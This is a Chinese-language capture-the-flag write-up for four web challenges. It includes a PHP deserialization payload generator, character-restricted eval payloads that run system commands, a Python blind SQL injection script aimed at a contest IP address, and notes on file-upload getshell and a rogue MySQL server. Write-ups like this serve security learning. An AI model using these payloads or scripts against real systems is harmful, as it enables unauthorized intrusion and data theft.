这次国赛的Web题目质量还不错,这里做个记录。
JustSoso
根据 html注释 结合 php伪协议 ,可以读取出 index.php 和 hint.php 的源代码。
http://xxx/index.php?file=php://filter/read/convert.base64-encode/resource=index.php
http://xxx/index.php?file=php://filter/read/convert.base64-encode/resource=hint.php
index.php 中会反序列化 $_GET["payload"] ,且 parse_url 函数处理后不能包含 flag 字符串,用 /// 即可绕过 parse_url 函数,具体可参考 http://www.am0s.com/functions/406.html
hint.php 中的对象在反序列化的时候,会先调用 __wakeup 魔术方法,其会把对象的所有属性置 null,猜测考察的知识点是绕过 PHP反序列化 的一个 bug ,具体参考: https://mochazz.github.io/2018/12/30/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96bug/ 。
最后获取 flag 的地方,需要 $this->token === $this->token_flag
,而 $this->token_flag 在每次调用 getFlag 函数都会重新生成,这时候我们便可以用引用变量来解决这个问题。最终 payload 如下:
<?php
class Handle{
private $handle;
public function __construct($handle) {
$this->handle = $handle;
}
public function __destruct(){
$this->handle->getFlag();
}
}
class Flag{
public $file;
public $token;
public $token_flag;
function __construct($file){
$this->file = $file;
$this->token = &$this->token_flag;
}
public function getFlag(){
// $this->token_flag = md5(rand(1,10000));
if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true);
}
}
}
}
$flag = new Flag('flag.php');
$handle = new Handle($flag);
echo urlencode(str_replace('O:6:"Handle":1', 'O:6:"Handle":10', serialize($handle)));
?>
最后访问 http://xxx///index.php?file=hint.php&payload=上面生成的payload 即可。
最后贴一个PHP反序列化标识符含义:
a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string
https://blog.csdn.net/heiyeshuwu/article/details/748935
love_math
calc.php 源码如下:
可以看到 $content 会经过黑白名单校验且长度不能大于等于80,通过校验的 $content 最终会在 eval 函数中执行。看到这个,就想起了之前遇到的无字母 webshell 的题目。而这里只能用 $whitelist 中的函数。在查阅 base_convert 函数时,发现其可以进行2~36进制之间的转换,超过9的部分用字母a-z表示,即可表示的字符范围是:0-9a-z。,下面我们就可以构造最简单的 phpinfo: base_convert(55490343972,10,36)()
➜ Desktop php -a
php > echo base_convert('phpinfo',36,10);
55490343972
执行 system('ls') :base_convert(1751504350,10,36)(base_convert(784,10,36))
➜ Desktop php -a
php > echo base_convert('system',36,10);
1751504350
php > echo base_convert('ls',36,10);
784
php > echo strlen('base_convert(1751504350,10,36)(base_convert(784,10,36))');
55
由于不能引入0-9a-z以外的字符,所以这里又通过构造 hex2bin 来执行命令。
➜ Desktop php -a
php > echo base_convert('exec',36,10);
696468
php > echo base_convert('hex2bin',36,10);
37907361743
php > echo hexdec(bin2hex('ls *'));
1819484202
php > echo strlen('base_convert(696468,10,36)(base_convert(37907361743,10,36)(dechex(1819484202)))');
79
但是用 exec 有个问题,就是只会显示返回结果的最后一行,这样就没办法看到 flag ,强行构造就超出80字符的限制了。后来又想到之前做的40字符限制的题目,想着应该要通过其他参数引入的方式,打破字符长度限制,于是开始构造 $_GET 。
➜ Desktop php -a
php > echo base_convert('hex2bin',36,10);
37907361743
php > echo hexdec(bin2hex('_GET'));
1598506324
payload:
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac flag.php
相当于:
$pi=_GET;($_GET[pi])($_GET[abs])
我们将要执行的函数和参数通过其他参数引入,这里变量名和函数名必须在白名单中。
这里有用到一个trick,就是使用 {} 来代替 [] 进行数组索引,这个其实在PHP手册中有提到,具体参看这个用力的Note: https://www.php.net/manual/en/language.types.array.php#language.types.array.syntax.accessing 。另外PHP5和7的一些差别,可以参看一下手册: https://www.php.net/manual/zh/migration70.php
全宇宙最简单的SQL
WAF 会将某些字符替换成 QwQ ,经过测试,发现过滤了 |、or、sleep、if、benchmark、case 等字符。
返回信息有两种:
- SQL语法正确的话,如果账号密码不对,会显示 登陆失败 。例如:
username=admin&password=admin
- SQL语法不正确的话,会显示 数据库操作失败 。例如:
username=admin'&password=admin
那么我们可以利用逻辑运算符和溢出报错来进行注入,例如这里我们用 pow(9999,100) ,这个表达式的值在 MYSQL 中已经超出 double 范围,会溢出。如下图,当我们盲注语句结果为真时,就会执行到溢出语句,返回结果为 数据库操作失败 ;当我们盲注语句结果为假时,由于 and短路运算 ,根本不会执行到溢出语句,所以返回结果为 登陆失败 。
通过这种注入方式,我们可以得到以下信息:
- mysql版本:5.5.62
- 库名:ctf
- 用户:ctt123
但是无法注出表名和列名,因为 or 被过滤了, information_schema 就不能用了。不过我们可以通过语句: admin'^1+and+substr((select+username+from+user+limit+1),1,1)='a'+and+pow(9999,100)%23 ,判断出其存在 user 表和 username 列,再根据题目的界面显示的内容,猜测其可能还存在 password 列。但是 password 又包含 or 关键字,这时想起了以前看过的一篇文章:如何在不知道MySQL列名的情况下注入出数据? 。最终可以用这个技巧注出 admin 用户的密码: f1ag@1s-at_/fll1llag_h3r3 ,注入脚本如下:
import requests,re
url = "http://39.97.167.120:52105"
admin_pass = ''
charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$%&\'()*+,-./:;<=>?@[\\]^_`}{~#'
for i in range(1,100):
for char in charset:
if char == '#':
# print('#')
# print(admin_pass)
exit()
datas = {
'username' : "admin'^1 and substr((select `2` from (select 1,2 union select * from user)a limit 1,1),%d,1)='%s' and pow(9999,100)#" % (i,char),
'password' : 'admin'
}
r = requests.post(url=url,data = datas)
r.encoding = r.apparent_encoding
if '数据库操作失败' in r.text:
# print(char)
admin_pass += char
print(admin_pass)
break
但是仍然还是无法登录,看密码的含义,应该要读取 /fll1llag_h3r3 文件。但是用了 Mysql 中的读取函数,发现并不行,于是又想到我上面的脚本直接比较的是字符,可能存在大小写问题。后来用ASCII值来判断,跑出来的结果是: F1AG@1s-at_/fll1llag_h3r3 。再次登录,发现多了远程连接 Mysql 的功能。
这个考点,一下子让我想起上周DDCTF的题目。通过伪造 Mysql 服务端,任意读取连接过来的客户端的本地文件,从而获取flag。这里我直接用github上写好的脚本,修改代码中的文件名即可。 https://github.com/allyshka/Rogue-MySql-Server
RefSpace
通过 php伪协议 可以获得题目环境中的文件结构如下:
➜ html tree
.
├── app
│ ├── flag.php
│ ├── index.php
│ └── Up10aD.php
├── backup.zip
├── flag.txt
├── index.php
├── robots.txt
└── upload
2 directories, 7 files
源码如下:
可以看到 index.php 中存在任意文件包含,但是限制了文件名后缀只能是 .php ,而 app/Up10aD.php 文件中存在上传功能,刚好可以配合前面的文件包含进行 getshell 。具体可以参考:zip或phar协议包含文件 。getshell之后,只在服务器上发现了加密后的flag.txt。在 app/flag.php 开头添加上如下代码,访问时 $key 值随便填。
namespace interesting;
function sha1($var) { // 调用类的私有、保护方法
$class = new \ReflectionClass('interesting\FlagSDK');
$method = $class->getMethod('getHash');
$method->setAccessible(true);
$instance = $class->newInstance();
return $method->invoke($instance);
}
其原理就是通过命名空间,定义一个同名函数 sha1 ,在代码调用时,会优先调用本命名空间中的同名函数。另外还有一个考点就是通过反射调用类的私有、保护方法,具体百度即可。绕过 sha1 的比较,我们就能拿到flag了,backup.zip/sdk开发文档.txt 中的 return "too{young-too-simple}" 只是个例子,其真正的语句类似 return openssl_decrypt(file_get_contents(‘flag路径), '加密算法', $key) 。